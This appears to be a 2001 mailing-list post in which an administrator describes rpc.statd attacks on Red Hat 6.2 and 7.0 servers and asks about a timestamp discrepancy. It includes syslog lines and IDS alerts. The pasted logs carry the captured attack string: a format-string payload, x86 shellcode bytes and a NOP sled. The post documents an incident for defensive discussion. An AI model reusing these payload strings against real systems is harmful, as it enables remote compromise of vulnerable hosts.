statd-exploit attack against RH 7.0

["Johan.Augustsson" <Johan.Augustsson () ADM GU SE>]

My apologies if this already have been discussed in this forum.


We got a few attacks from scriptkiddies running some statd.x against our 
network and when I look at the messages in /var/log it looks different on a 
Red Hat 6.2 and 7.0 The thing thats annoys me is that at the Red Hat 7.0 
the timestamp for the attack has turned one hour backwards. Has anyone else 
seen this?

/Johan Augustsson


Red Hat 7.0
Jan 8 20:20:00 'system' some other event
Jan 8 19:24:04 'system' rpc.statd[366]: gethostbyname error for 
^X÷ÿ¿^X÷ÿ¿^Y÷ÿ¿^Y÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿^[÷ÿ¿^[÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n1Àë|Y‰A^P‰A^HþÀ‰A^D‰ÃþÀ‰^A°f̀³^B‰Y^LÆA^N™ÆA^H^P‰I^D€A^D^Lˆ^A°f̀³^D°f̀³^E0ÀˆA^D°f̀‰ÎˆÃ1É°?Í
Jan 8 20:25:00 'system' some other event


Red Hat 6.2
Jan 8 19:31:39 'system' some other event
Jan 8 20:05:57 'system' rpc.statd[356]: gethostbyname error for 
^X÷ÿ¿^X÷ÿ¿^Y÷ÿ¿^Y÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿^[÷ÿ¿^[÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 

Jan 8 22:23:48 'system' some other event


And the logs from the IDS

2001-01-08 20:24:04  206.210.80.6 1088  ->  'Red Hat 7.0 111 IDS15 - RPC - 
portmap-request-status
2001-01-08 20:24:04  206.210.80.6 1088  ->  'Red Hat 7.0' 1025 IDS362 - 
MISC - Shellcode X86 NOPS-UDP
2001-01-08 20:05:57  206.210.80.6 1088  ->  'Red Hat 6.2' 111 IDS15 - RPC - 
portmap-request-status
2001-01-08 20:05:57  206.210.80.6 1088  ->  'Red Hat 6.2' 957 IDS362 - MISC 
- Shellcode X86 NOPS-UDP